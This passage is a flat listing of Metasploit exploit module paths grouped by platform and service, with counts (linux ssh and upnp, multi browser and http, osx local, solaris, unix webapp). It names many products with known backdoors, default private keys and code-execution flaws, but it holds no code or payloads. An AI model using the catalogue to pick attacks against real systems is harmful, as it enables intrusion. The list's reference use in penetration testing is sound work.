exploit/linux/snmp/net_snmpd_rw_access | . | ssh (15) . | exploit/linux/ssh/ceragon_fibeair_known_privkey | exploit/linux/ssh/cisco_ucs_scpuser | exploit/linux/ssh/exagrid_known_privkey | exploit/linux/ssh/f5_bigip_known_privkey | exploit/linux/ssh/ibm_drm_a3user | exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey | exploit/linux/ssh/mercurial_ssh_exec | exploit/linux/ssh/microfocus_obr_shrboadmin | exploit/linux/ssh/quantum_dxi_known_privkey | exploit/linux/ssh/quantum_vmpro_backdoor | exploit/linux/ssh/solarwinds_lem_exec | exploit/linux/ssh/symantec_smg_ssh | exploit/linux/ssh/vmware_vdp_known_privkey | exploit/linux/ssh/vmware_vrni_known_privkey | exploit/linux/ssh/vyos_restricted_shell_privesc | . | telnet (2) . 
| exploit/linux/telnet/netgear_telnetenable | exploit/linux/telnet/telnet_encrypt_keyid | . | upnp (5) . | exploit/linux/upnp/belkin_wemo_upnp_exec | exploit/linux/upnp/dlink_dir859_exec_ssdpcgi | exploit/linux/upnp/dlink_dir859_subscribe_exec | exploit/linux/upnp/dlink_upnp_msearch_exec | exploit/linux/upnp/miniupnpd_soap_bof | . | . | mainframe (1) . | ftp (1) . | exploit/mainframe/ftp/ftp_jcl_creds | . | . | multi (458) . | browser (49) . | exploit/multi/browser/adobe_flash_hacking_team_uaf | exploit/multi/browser/adobe_flash_nellymoser_bof | exploit/multi/browser/adobe_flash_net_connection_confusion | exploit/multi/browser/adobe_flash_opaque_background_uaf | exploit/multi/browser/adobe_flash_pixel_bender_bof | exploit/multi/browser/adobe_flash_shader_drawing_fill | exploit/multi/browser/adobe_flash_shader_job_overflow | exploit/multi/browser/adobe_flash_uncompress_zlib_uaf | exploit/multi/browser/chrome_array_map | exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation | exploit/multi/browser/chrome_jscreate_sideeffect | exploit/multi/browser/chrome_object_create | exploit/multi/browser/chrome_simplifiedlowering_overflow | exploit/multi/browser/firefox_escape_retval | exploit/multi/browser/firefox_jit_use_after_free | exploit/multi/browser/firefox_pdfjs_privilege_escalation | exploit/multi/browser/firefox_proto_crmfrequest | exploit/multi/browser/firefox_proxy_prototype | exploit/multi/browser/firefox_queryinterface | exploit/multi/browser/firefox_svg_plugin | exploit/multi/browser/firefox_tostring_console_injection | exploit/multi/browser/firefox_webidl_injection | exploit/multi/browser/firefox_xpi_bootstrapped_addon | exploit/multi/browser/itms_overflow | exploit/multi/browser/java_atomicreferencearray | exploit/multi/browser/java_calendar_deserialize | exploit/multi/browser/java_getsoundbank_bof | exploit/multi/browser/java_jre17_driver_manager | exploit/multi/browser/java_jre17_exec | 
exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl | exploit/multi/browser/java_jre17_jaxws | exploit/multi/browser/java_jre17_jmxbean | exploit/multi/browser/java_jre17_jmxbean_2 | exploit/multi/browser/java_jre17_method_handle | exploit/multi/browser/java_jre17_provider_skeleton | exploit/multi/browser/java_jre17_reflection_types | exploit/multi/browser/java_rhino | exploit/multi/browser/java_rmi_connection_impl | exploit/multi/browser/java_setdifficm_bof | exploit/multi/browser/java_signed_applet | exploit/multi/browser/java_storeimagearray | exploit/multi/browser/java_trusted_chain | exploit/multi/browser/java_verifier_field_access | exploit/multi/browser/mozilla_compareto | exploit/multi/browser/mozilla_navigatorjava | exploit/multi/browser/msfd_rce_browser | exploit/multi/browser/opera_configoverwrite | exploit/multi/browser/opera_historysearch | exploit/multi/browser/qtjava_pointer | . | elasticsearch (2) . | exploit/multi/elasticsearch/script_mvel_rce | exploit/multi/elasticsearch/search_groovy_script | . | fileformat (16) . | exploit/multi/fileformat/adobe_u3d_meshcont | exploit/multi/fileformat/archive_tar_arb_file_write | exploit/multi/fileformat/evince_cbt_cmd_injection | exploit/multi/fileformat/ghostscript_failed_restore | exploit/multi/fileformat/ghostscript_format_string_cve_2024_29510 | exploit/multi/fileformat/gitlens_local_config_exec | exploit/multi/fileformat/js_unpacker_eval_injection | exploit/multi/fileformat/libreoffice_logo_exec | exploit/multi/fileformat/libreoffice_macro_exec | exploit/multi/fileformat/maple_maplet | exploit/multi/fileformat/nodejs_js_yaml_load_code_exec | exploit/multi/fileformat/office_word_macro | exploit/multi/fileformat/peazip_command_injection | exploit/multi/fileformat/swagger_param_inject | exploit/multi/fileformat/visual_studio_vsix_exec | exploit/multi/fileformat/zip_slip | . | ftp (2) . | exploit/multi/ftp/pureftpd_bash_env_exec | exploit/multi/ftp/wuftpd_site_exec_format | . | gdb (1) . 
| exploit/multi/gdb/gdb_server_exec | . | hams (1) . | exploit/multi/hams/steamed | . | http (308) . | exploit/multi/http/activecollab_chat | exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360 | exploit/multi/http/agent_tesla_panel_rce | exploit/multi/http/ajaxplorer_checkinstall_exec | exploit/multi/http/apache_activemq_upload_jsp | exploit/multi/http/apache_apisix_api_default_token_rce | exploit/multi/http/apache_commons_text4shell | exploit/multi/http/apache_couchdb_erlang_rce | exploit/multi/http/apache_druid_cve_2023_25194 | exploit/multi/http/apache_flink_jar_upload_exec | exploit/multi/http/apache_jetspeed_file_upload | exploit/multi/http/apache_mod_cgi_bash_env_exec | exploit/multi/http/apache_nifi_processor_rce | exploit/multi/http/apache_normalize_path_rce | exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal | exploit/multi/http/apache_rocketmq_update_config | exploit/multi/http/apache_roller_ognl_injection | exploit/multi/http/apprain_upload_exec | exploit/multi/http/atlassian_confluence_namespace_ognl_injection | exploit/multi/http/atlassian_confluence_rce_cve_2023_22515 | exploit/multi/http/atlassian_confluence_rce_cve_2023_22527 | exploit/multi/http/atlassian_confluence_rce_cve_2024_21683 | exploit/multi/http/atlassian_confluence_unauth_backup | exploit/multi/http/atlassian_confluence_webwork_ognl_injection | exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce | exploit/multi/http/atutor_sqli | exploit/multi/http/atutor_upload_traversal | exploit/multi/http/auxilium_upload_exec | exploit/multi/http/avideo_wwbnindex_unauth_rce | exploit/multi/http/axis2_deployer | exploit/multi/http/baldr_upload_exec | exploit/multi/http/bassmaster_js_injection | exploit/multi/http/bitbucket_env_var_rce | exploit/multi/http/bolt_file_upload | exploit/multi/http/builderengine_upload_exec | exploit/multi/http/cacti_package_import_rce | exploit/multi/http/cacti_pollers_sqli_rce | exploit/multi/http/caidao_php_backdoor_exec | 
    exploit/multi/http/churchinfo_upload_exec
    exploit/multi/http/cisco_dcnm_upload
    exploit/multi/http/cisco_dcnm_upload_2019
    exploit/multi/http/clipbucket_fileupload_exec
    exploit/multi/http/cmsms_object_injection_rce
    exploit/multi/http/cmsms_showtime2_rce
    exploit/multi/http/cmsms_upload_rename_rce
    exploit/multi/http/cockpit_cms_rce
    exploit/multi/http/coldfusion_ckeditor_file_upload
    exploit/multi/http/coldfusion_rds_auth_bypass
    exploit/multi/http/confluence_widget_connector
    exploit/multi/http/connectwise_screenconnect_rce_cve_2024_1709
    exploit/multi/http/crushftp_rce_cve_2023_43177
    exploit/multi/http/cups_bash_env_exec
    exploit/multi/http/cuteflow_upload_exec
    exploit/multi/http/cve_2021_35464_forgerock_openam
    exploit/multi/http/cve_2023_38836_boidcms
    exploit/multi/http/dexter_casinoloader_exec
    exploit/multi/http/dotcms_file_upload_rce
    exploit/multi/http/drupal_drupageddon
    exploit/multi/http/eaton_nsm_code_exec
    exploit/multi/http/eventlog_file_upload
    exploit/multi/http/extplorer_upload_exec
    exploit/multi/http/familycms_less_exec
    exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204
    exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
    exploit/multi/http/freenas_exec_raw
    exploit/multi/http/gambio_unauth_rce_cve_2024_23759
    exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
    exploit/multi/http/gestioip_exec
    exploit/multi/http/getsimplecms_unauth_code_exec
    exploit/multi/http/gibbon_auth_rce_cve_2024_24725
    exploit/multi/http/git_client_command_exec
    exploit/multi/http/git_lfs_clone_command_exec
    exploit/multi/http/git_submodule_command_exec
    exploit/multi/http/git_submodule_url_exec
    exploit/multi/http/gitea_git_fetch_rce
    exploit/multi/http/gitea_git_hooks_rce
    exploit/multi/http/gitlab_exif_rce
    exploit/multi/http/gitlab_file_read_rce
    exploit/multi/http/gitlab_github_import_rce_cve_2022_2992
    exploit/multi/http/gitlab_shell_exec
    exploit/multi/http/gitlist_arg_injection
    exploit/multi/http/gitorious_graph
    exploit/multi/http/glassfish_deployer
    exploit/multi/http/glossword_upload_exec
    exploit/multi/http/glpi_install_rce
    exploit/multi/http/gogs_git_hooks_rce
    exploit/multi/http/horde_csv_rce
    exploit/multi/http/horde_form_file_upload
    exploit/multi/http/horde_href_backdoor
    exploit/multi/http/horizontcms_upload_exec
    exploit/multi/http/hp_sitescope_issuesiebelcmd
    exploit/multi/http/hp_sitescope_uploadfileshandler
    exploit/multi/http/hp_sys_mgmt_exec
    exploit/multi/http/hyperic_hq_script_console
    exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec
    exploit/multi/http/ispconfig_php_exec
    exploit/multi/http/jboss_bshdeployer
    exploit/multi/http/jboss_deploymentfilerepository
    exploit/multi/http/jboss_invoke_deploy
    exploit/multi/http/jboss_maindeployer
    exploit/multi/http/jboss_seam_upload_exec
    exploit/multi/http/jenkins_metaprogramming
    exploit/multi/http/jenkins_script_console
    exploit/multi/http/jenkins_xstream_deserialize
    exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793
    exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
    exploit/multi/http/jira_hipchat_template
    exploit/multi/http/jira_plugin_upload
    exploit/multi/http/joomla_http_header_rce
    exploit/multi/http/kong_gateway_admin_api_rce
    exploit/multi/http/kordil_edms_upload_exec
    exploit/multi/http/lcms_php_exec
    exploit/multi/http/liferay_java_unmarshalling
    exploit/multi/http/log1cms_ajax_create_folder
    exploit/multi/http/log4shell_header_injection
    exploit/multi/http/lucee_scheduled_job
    exploit/multi/http/magento_unserialize
    exploit/multi/http/makoserver_cmd_exec
    exploit/multi/http/manage_engine_dc_pmp_sqli
    exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
    exploit/multi/http/manageengine_auth_upload
    exploit/multi/http/manageengine_sd_uploader
    exploit/multi/http/manageengine_search_sqli
    exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
    exploit/multi/http/mantisbt_manage_proj_page_rce
    exploit/multi/http/mantisbt_php_exec
    exploit/multi/http/maracms_upload_exec
    exploit/multi/http/mediawiki_syntaxhighlight
    exploit/multi/http/mediawiki_thumb
    exploit/multi/http/metasploit_static_secret_key_base
    exploit/multi/http/metasploit_webui_console_command_execution
    exploit/multi/http/microfocus_obm_auth_rce
    exploit/multi/http/microfocus_ucmdb_unauth_deser
    exploit/multi/http/mirth_connect_cve_2023_43208
    exploit/multi/http/mma_backdoor_upload
    exploit/multi/http/mobilecartly_upload_exec
    exploit/multi/http/monitorr_webshell_rce_cve_2020_28871
    exploit/multi/http/monstra_fileupload_exec
    exploit/multi/http/moodle_admin_shell_upload
    exploit/multi/http/moodle_spelling_binary_rce
    exploit/multi/http/moodle_spelling_path_rce
    exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
    exploit/multi/http/movabletype_upgrade_exec
    exploit/multi/http/mutiny_subnetmask_exec
    exploit/multi/http/mybb_rce_cve_2022_24734
    exploit/multi/http/nas4free_php_exec
    exploit/multi/http/navigate_cms_rce
    exploit/multi/http/netwin_surgeftp_exec
    exploit/multi/http/nibbleblog_file_upload
    exploit/multi/http/nostromo_code_exec
    exploit/multi/http/novell_servicedesk_rce
    exploit/multi/http/nuuo_nvrmini_upgrade_rce
    exploit/multi/http/october_upload_bypass_exec
    exploit/multi/http/op5_license
    exploit/multi/http/op5_welcome
    exploit/multi/http/open_web_analytics_rce
    exploit/multi/http/openfire_auth_bypass
    exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
    exploit/multi/http/openmrs_deserialization
    exploit/multi/http/openx_backdoor_php
    exploit/multi/http/opmanager_socialit_file_upload
    exploit/multi/http/opmanager_sumpdu_deserialization
    exploit/multi/http/oracle_ats_file_upload
    exploit/multi/http/oracle_reports_rce
    exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
    exploit/multi/http/orientdb_exec
    exploit/multi/http/oscommerce_installer_unauth_code_exec
    exploit/multi/http/pandora_upload_exec
    exploit/multi/http/papercut_ng_auth_bypass
    exploit/multi/http/pentaho_business_server_authbypass_and_ssti
    exploit/multi/http/pgadmin_session_deserialization
    exploit/multi/http/phoenix_exec
    exploit/multi/http/php_cgi_arg_injection
    exploit/multi/http/php_fpm_rce
    exploit/multi/http/php_utility_belt_rce
    exploit/multi/http/php_volunteer_upload_exec
    exploit/multi/http/phpfilemanager_rce
    exploit/multi/http/phpldapadmin_query_engine
    exploit/multi/http/phpmailer_arg_injection
    exploit/multi/http/phpmoadmin_exec
    exploit/multi/http/phpmyadmin_3522_backdoor
    exploit/multi/http/phpmyadmin_lfi_rce
    exploit/multi/http/phpmyadmin_null_termination_exec
    exploit/multi/http/phpmyadmin_preg_replace
    exploit/multi/http/phpscheduleit_start_date
    exploit/multi/http/phpstudy_backdoor_rce
    exploit/multi/http/phptax_exec
    exploit/multi/http/phpwiki_ploticus_exec
    exploit/multi/http/pimcore_unserialize_rce
    exploit/multi/http/playsms_filename_exec
    exploit/multi/http/playsms_template_injection
    exploit/multi/http/playsms_uploadcsv_exec
    exploit/multi/http/plone_popen2
    exploit/multi/http/pmwiki_pagelist
    exploit/multi/http/polarcms_upload_exec
    exploit/multi/http/processmaker_exec
    exploit/multi/http/processmaker_plugin_upload
    exploit/multi/http/qdpm_authenticated_rce
    exploit/multi/http/qdpm_upload_exec
    exploit/multi/http/rails_actionpack_inline_exec
    exploit/multi/http/rails_double_tap
    exploit/multi/http/rails_dynamic_render_code_exec
    exploit/multi/http/rails_json_yaml_code_exec
    exploit/multi/http/rails_secret_deserialization
    exploit/multi/http/rails_web_console_v2_code_exec
    exploit/multi/http/rails_xml_yaml_code_exec
    exploit/multi/http/rocket_servergraph_file_requestor_rce
    exploit/multi/http/rudder_server_sqli_rce
    exploit/multi/http/sflog_upload_exec
    exploit/multi/http/shiro_rememberme_v124_deserialize
    exploit/multi/http/shopware_createinstancefromnamedarguments_rce
    exploit/multi/http/simple_backdoors_exec
    exploit/multi/http/sit_file_upload
    exploit/multi/http/snortreport_exec
    exploit/multi/http/solarwinds_store_manager_auth_filter
    exploit/multi/http/solr_velocity_rce
    exploit/multi/http/sonicwall_gms_upload
    exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli
    exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
    exploit/multi/http/spip_bigup_unauth_rce
    exploit/multi/http/spip_connect_exec
    exploit/multi/http/spip_porte_plume_previsu_rce
    exploit/multi/http/spip_rce_form
    exploit/multi/http/splunk_mappy_exec
    exploit/multi/http/splunk_privilege_escalation_cve_2023_32707
    exploit/multi/http/splunk_upload_app_exec
    exploit/multi/http/spree_search_exec
    exploit/multi/http/spree_searchlogic_exec
    exploit/multi/http/spring_cloud_function_spel_injection
    exploit/multi/http/spring_framework_rce_spring4shell
    exploit/multi/http/struts2_code_exec_showcase
    exploit/multi/http/struts2_content_type_ognl
    exploit/multi/http/struts2_multi_eval_ognl
    exploit/multi/http/struts2_namespace_ognl
    exploit/multi/http/struts2_rest_xstream
    exploit/multi/http/struts_code_exec
    exploit/multi/http/struts_code_exec_classloader
    exploit/multi/http/struts_code_exec_exception_delegator
    exploit/multi/http/struts_code_exec_parameters
    exploit/multi/http/struts_default_action_mapper
    exploit/multi/http/struts_dev_mode
    exploit/multi/http/struts_dmi_exec
    exploit/multi/http/struts_dmi_rest_exec
    exploit/multi/http/struts_include_params
    exploit/multi/http/stunshell_eval
    exploit/multi/http/stunshell_exec
    exploit/multi/http/subrion_cms_file_upload_rce
    exploit/multi/http/sugarcrm_webshell_cve_2023_22952
    exploit/multi/http/sun_jsws_dav_options
    exploit/multi/http/sysaid_auth_file_upload
    exploit/multi/http/sysaid_rdslogs_file_upload
    exploit/multi/http/testlink_upload_exec
    exploit/multi/http/tomcat_jsp_upload_bypass
    exploit/multi/http/tomcat_mgr_deploy
    exploit/multi/http/tomcat_mgr_upload
    exploit/multi/http/torchserver_cve_2023_43654
    exploit/multi/http/totaljs_cms_widget_exec
    exploit/multi/http/traq_plugin_exec
    exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi
    exploit/multi/http/ubiquiti_unifi_log4shell
    exploit/multi/http/uptime_file_upload_1
    exploit/multi/http/uptime_file_upload_2
    exploit/multi/http/v0pcr3w_exec
    exploit/multi/http/vbseo_proc_deutf
    exploit/multi/http/vbulletin_getindexablecontent
    exploit/multi/http/vbulletin_unserialize
    exploit/multi/http/vbulletin_widget_template_rce
    exploit/multi/http/vbulletin_widgetconfig_rce
    exploit/multi/http/visual_mining_netcharts_upload
    exploit/multi/http/vmware_vcenter_log4shell
    exploit/multi/http/vmware_vcenter_uploadova_rce
    exploit/multi/http/vtiger_install_rce
    exploit/multi/http/vtiger_logo_upload_exec
    exploit/multi/http/vtiger_php_exec
    exploit/multi/http/vtiger_soap_upload
    exploit/multi/http/weblogic_admin_handle_rce
    exploit/multi/http/webnms_file_upload
    exploit/multi/http/webpagetest_upload_exec
    exploit/multi/http/werkzeug_debug_rce
    exploit/multi/http/wikka_spam_exec
    exploit/multi/http/wp_ait_csv_rce
    exploit/multi/http/wp_backup_migration_php_filter
    exploit/multi/http/wp_bricks_builder_rce
    exploit/multi/http/wp_catch_themes_demo_import
    exploit/multi/http/wp_crop_rce
    exploit/multi/http/wp_db_backup_rce
    exploit/multi/http/wp_dnd_mul_file_rce
    exploit/multi/http/wp_file_manager_rce
    exploit/multi/http/wp_givewp_rce
    exploit/multi/http/wp_hash_form_rce
    exploit/multi/http/wp_litespeed_cookie_theft
    exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
    exploit/multi/http/wp_plugin_backup_guard_rce
    exploit/multi/http/wp_plugin_elementor_auth_upload_rce
    exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
    exploit/multi/http/wp_plugin_modern_events_calendar_rce
    exploit/multi/http/wp_plugin_sp_project_document_rce
    exploit/multi/http/wp_popular_posts_rce
    exploit/multi/http/wp_responsive_thumbnail_slider_upload
    exploit/multi/http/wp_royal_elementor_addons_rce
    exploit/multi/http/wp_simple_file_list_rce
    exploit/multi/http/wso2_file_upload_rce
    exploit/multi/http/x7chat2_php_exec
    exploit/multi/http/zabbix_script_exec
    exploit/multi/http/zemra_panel_rce
    exploit/multi/http/zenworks_configuration_management_upload
    exploit/multi/http/zenworks_control_center_upload
    exploit/multi/http/zpanel_information_disclosure_rce
  ids (1)
    exploit/multi/ids/snort_dce_rpc
  iiop (1)
    exploit/multi/iiop/cve_2023_21839_weblogic_rce
  kubernetes (1)
    exploit/multi/kubernetes/exec
  local (5)
    exploit/multi/local/allwinner_backdoor
    exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
    exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
    exploit/multi/local/xorg_x11_suid_server
    exploit/multi/local/xorg_x11_suid_server_modulepath
  misc (46)
    exploit/multi/misc/apache_activemq_rce_cve_2023_46604
    exploit/multi/misc/arkeia_agent_exec
    exploit/multi/misc/batik_svg_java
    exploit/multi/misc/bmc_patrol_cmd_exec
    exploit/multi/misc/bmc_server_automation_rscd_nsh_rce
    exploit/multi/misc/calibre_exec
    exploit/multi/misc/claymore_dual_miner_remote_manager_rce
    exploit/multi/misc/consul_rexec_exec
    exploit/multi/misc/consul_service_exec
    exploit/multi/misc/erlang_cookie_rce
    exploit/multi/misc/freeswitch_event_socket_cmd_exec
    exploit/multi/misc/hp_data_protector_exec_integutil
    exploit/multi/misc/hp_vsa_exec
    exploit/multi/misc/ibm_tm1_unauth_rce
    exploit/multi/misc/indesign_server_soap
    exploit/multi/misc/java_jdwp_debugger
    exploit/multi/misc/java_jmx_server
    exploit/multi/misc/java_rmi_server
    exploit/multi/misc/jboss_remoting_unified_invoker_rce
    exploit/multi/misc/legend_bot_exec
    exploit/multi/misc/msf_rpc_console
    exploit/multi/misc/msfd_rce_remote
    exploit/multi/misc/nodejs_v8_debugger
    exploit/multi/misc/nomad_exec
    exploit/multi/misc/openoffice_document_macro
    exploit/multi/misc/openview_omniback_exec
    exploit/multi/misc/osgi_console_exec
    exploit/multi/misc/pbot_exec
    exploit/multi/misc/persistent_hpca_radexec_exec
    exploit/multi/misc/qemu_monitor_hmp_migrate_cmd_exec
    exploit/multi/misc/ra1nx_pubcall_exec
    exploit/multi/misc/teamcity_agent_xmlrpc_exec
    exploit/multi/misc/veritas_netbackup_cmdexec
    exploit/multi/misc/vscode_ipynb_remote_dev_exec
    exploit/multi/misc/w3tw0rk_exec
    exploit/multi/misc/weblogic_deserialize
    exploit/multi/misc/weblogic_deserialize_asyncresponseservice
    exploit/multi/misc/weblogic_deserialize_badattr_extcomp
    exploit/multi/misc/weblogic_deserialize_badattrval
    exploit/multi/misc/weblogic_deserialize_marshalledobject
    exploit/multi/misc/weblogic_deserialize_rawobject
    exploit/multi/misc/weblogic_deserialize_unicastref
    exploit/multi/misc/wireshark_lwres_getaddrbyname
    exploit/multi/misc/wireshark_lwres_getaddrbyname_loop
    exploit/multi/misc/xdh_x_exec
    exploit/multi/misc/zend_java_bridge
  mysql (1)
    exploit/multi/mysql/mysql_udf_payload
  ntp (1)
    exploit/multi/ntp/ntp_overflow
  php (4)
    exploit/multi/php/ignition_laravel_debug_rce
    exploit/multi/php/jorani_path_trav
    exploit/multi/php/php_unserialize_zval_cookie
    exploit/multi/php/wp_duplicator_code_inject
  postgres (2)
    exploit/multi/postgres/postgres_copy_from_program_cmd_exec
    exploit/multi/postgres/postgres_createlang
  realserver (1)
    exploit/multi/realserver/describe
  samba (2)
    exploit/multi/samba/nttrans
    exploit/multi/samba/usermap_script
  sap (4)
    exploit/multi/sap/cve_2020_6207_solman_rs
    exploit/multi/sap/sap_mgmt_con_osexec_payload
    exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec
    exploit/multi/sap/sap_soap_rfc_sxpg_command_exec
  scada (1)
    exploit/multi/scada/inductive_ignition_rce
  script (1)
    exploit/multi/script/web_delivery
  ssh (1)
    exploit/multi/ssh/sshexec
  svn (1)
    exploit/multi/svn/svnserve_date
  upnp (1)
    exploit/multi/upnp/libupnp_ssdp_overflow
  veritas (1)
    exploit/multi/veritas/beagent_sha_auth_rce
  vnc (1)
    exploit/multi/vnc/vnc_keyboard_exec
  vpn (1)
    exploit/multi/vpn/tincd_bof
  wyse (1)
    exploit/multi/wyse/hagent_untrusted_hsdata
  exploit/multi/handler

netware (2)
  smb (1)
    exploit/netware/smb/lsass_cifs
  sunrpc (1)
    exploit/netware/sunrpc/pkernel_callit

openbsd (1)
  local (1)
    exploit/openbsd/local/dynamic_loader_chpass_privesc

osx (40)
  afp (1)
    exploit/osx/afp/loginext
  arkeia (1)
    exploit/osx/arkeia/type77
  browser (10)
    exploit/osx/browser/adobe_flash_delete_range_tl_op
    exploit/osx/browser/mozilla_mchannel
    exploit/osx/browser/osx_gatekeeper_bypass
    exploit/osx/browser/safari_file_policy
    exploit/osx/browser/safari_in_operator_side_effect
    exploit/osx/browser/safari_metadata_archive
    exploit/osx/browser/safari_proxy_object_type_confusion
    exploit/osx/browser/safari_user_assisted_applescript_exec
    exploit/osx/browser/safari_user_assisted_download_launch
    exploit/osx/browser/software_update
  email (1)
    exploit/osx/email/mailapp_image_exec
  ftp (1)
    exploit/osx/ftp/webstar_ftp_user
  http (1)
    exploit/osx/http/evocam_webserver
  local (20)
    exploit/osx/local/acronis_trueimage_xpc_privesc
    exploit/osx/local/cfprefsd_race_condition
    exploit/osx/local/dyld_print_to_file_root
    exploit/osx/local/feedback_assistant_root
    exploit/osx/local/iokit_keyboard_root
    exploit/osx/local/libxpc_mitm_ssudo
    exploit/osx/local/mac_dirty_cow
    exploit/osx/local/nfs_mount_root
    exploit/osx/local/persistence
    exploit/osx/local/root_no_password
    exploit/osx/local/rootpipe
    exploit/osx/local/rootpipe_entitlements
    exploit/osx/local/rsh_libmalloc
    exploit/osx/local/setuid_tunnelblick
    exploit/osx/local/setuid_viscosity
    exploit/osx/local/sudo_password_bypass
    exploit/osx/local/timemachine_cmd_injection
    exploit/osx/local/tpwn
    exploit/osx/local/vmware_bash_function_root
    exploit/osx/local/vmware_fusion_lpe
  mdns (1)
    exploit/osx/mdns/upnp_location
  misc (1)
    exploit/osx/misc/ufo_ai
  rtsp (1)
    exploit/osx/rtsp/quicktime_rtsp_content_type
  samba (2)
    exploit/osx/samba/lsa_transnames_heap
    exploit/osx/samba/trans2open

qnx (2)
  local (1)
    exploit/qnx/local/ifwatchd_priv_esc
  qconn (1)
    exploit/qnx/qconn/qconn_exec

solaris (14)
  dtspcd (1)
    exploit/solaris/dtspcd/heap_noir
  local (4)
    exploit/solaris/local/extremeparr_dtappgather_priv_esc
    exploit/solaris/local/libnspr_nspr_log_file_priv_esc
    exploit/solaris/local/rsh_stack_clash_priv_esc
    exploit/solaris/local/xscreensaver_log_priv_esc
  lpd (1)
    exploit/solaris/lpd/sendmail_exec
  samba (2)
    exploit/solaris/samba/lsa_transnames_heap
    exploit/solaris/samba/trans2open
  ssh (1)
    exploit/solaris/ssh/pam_username_bof
  sunrpc (3)
    exploit/solaris/sunrpc/sadmind_adm_build_path
    exploit/solaris/sunrpc/sadmind_exec
    exploit/solaris/sunrpc/ypupdated_exec
  telnet (2)
    exploit/solaris/telnet/fuser
    exploit/solaris/telnet/ttyprompt

unix (221)
  dhcp (2)
    exploit/unix/dhcp/bash_environment
    exploit/unix/dhcp/rhel_dhcp_client_command_injection
  fileformat (5)
    exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
    exploit/unix/fileformat/ghostscript_type_confusion
    exploit/unix/fileformat/imagemagick_delegate
    exploit/unix/fileformat/metasploit_libnotify_cmd_injection
    exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
  ftp (3)
    exploit/unix/ftp/proftpd_133c_backdoor
    exploit/unix/ftp/proftpd_modcopy_exec
    exploit/unix/ftp/vsftpd_234_backdoor
  http (29)
    exploit/unix/http/cacti_filter_sqli_rce
    exploit/unix/http/contentkeeperweb_mimencode
    exploit/unix/http/ctek_skyrouter
    exploit/unix/http/dell_kace_k1000_upload
    exploit/unix/http/epmp1000_get_chart_cmd_shell
    exploit/unix/http/epmp1000_ping_cmd_shell
    exploit/unix/http/freepbx_callmenum
    exploit/unix/http/laravel_token_unserialize_exec
    exploit/unix/http/lifesize_room
    exploit/unix/http/maltrail_rce
    exploit/unix/http/pfsense_clickjacking
    exploit/unix/http/pfsense_config_data_exec
    exploit/unix/http/pfsense_diag_routes_webshell
    exploit/unix/http/pfsense_graph_injection_exec
    exploit/unix/http/pfsense_group_member_exec
    exploit/unix/http/pfsense_pfblockerng_webshell
    exploit/unix/http/pihole_blocklist_exec
    exploit/unix/http/pihole_dhcp_mac_exec
    exploit/unix/http/pihole_whitelist_exec
    exploit/unix/http/quest_kace_systems_management_rce
    exploit/unix/http/raspap_rce
    exploit/unix/http/schneider_electric_net55xx_encoder
    exploit/unix/http/splunk_xslt_authenticated_rce
    exploit/unix/http/syncovery_linux_rce_2022_36534
    exploit/unix/http/tnftp_savefile
    exploit/unix/http/twiki_debug_plugins
    exploit/unix/http/vmturbo_vmtadmin_exec_noauth
    exploit/unix/http/xdebug_unauth_exec
    exploit/unix/http/zivif_ipcheck_exec
  irc (1)
    exploit/unix/irc/unreal_ircd_3281_backdoor
  local (7)
    exploit/unix/local/at_persistence
    exploit/unix/local/chkrootkit
    exploit/unix/local/emacs_movemail
    exploit/unix/local/exim_perl_startup
    exploit/unix/local/netbsd_mail_local
    exploit/unix/local/opensmtpd_oob_read_lpe
    exploit/unix/local/setuid_nmap
  misc (6)
    exploit/unix/misc/distcc_exec
    exploit/unix/misc/polycom_hdx_auth_bypass
    exploit/unix/misc/polycom_hdx_traceroute_exec
    exploit/unix/misc/spamassassin_exec
    exploit/unix/misc/xerox_mfp
    exploit/unix/misc/zabbix_agent_exec
  smtp (5)
    exploit/unix/smtp/clamav_milter_blackhole
    exploit/unix/smtp/exim4_string_format
    exploit/unix/smtp/morris_sendmail_debug
    exploit/unix/smtp/opensmtpd_mail_from_rce
    exploit/unix/smtp/qmail_bash_env_exec
  sonicwall (1)
    exploit/unix/sonicwall/sonicwall_xmlrpc_rce
  ssh (3)
    exploit/unix/ssh/arista_tacplus_shell
    exploit/unix/ssh/array_vxag_vapv_privkey_privesc
    exploit/unix/ssh/tectia_passwd_changereq
  webapp (158)
    exploit/unix/webapp/actualanalyzer_ant_cookie_exec
    exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce
    exploit/unix/webapp/ajenti_auth_username_cmd_injection
    exploit/unix/webapp/arkeia_upload_exec
    exploit/unix/webapp/awstats_configdir_exec
    exploit/unix/webapp/awstats_migrate_exec
    exploit/unix/webapp/awstatstotals_multisort
    exploit/unix/webapp/barracuda_img_exec
    exploit/unix/webapp/base_qry_common
    exploit/unix/webapp/basilic_diff_exec
    exploit/unix/webapp/bolt_authenticated_rce
    exploit/unix/webapp/byob_unauth_rce
    exploit/unix/webapp/cacti_graphimage_exec
    exploit/unix/webapp/cakephp_cache_corruption
    exploit/unix/webapp/carberp_backdoor_exec
    exploit/unix/webapp/citrix_access_gateway_exec
    exploit/unix/webapp/clipbucket_upload_exec
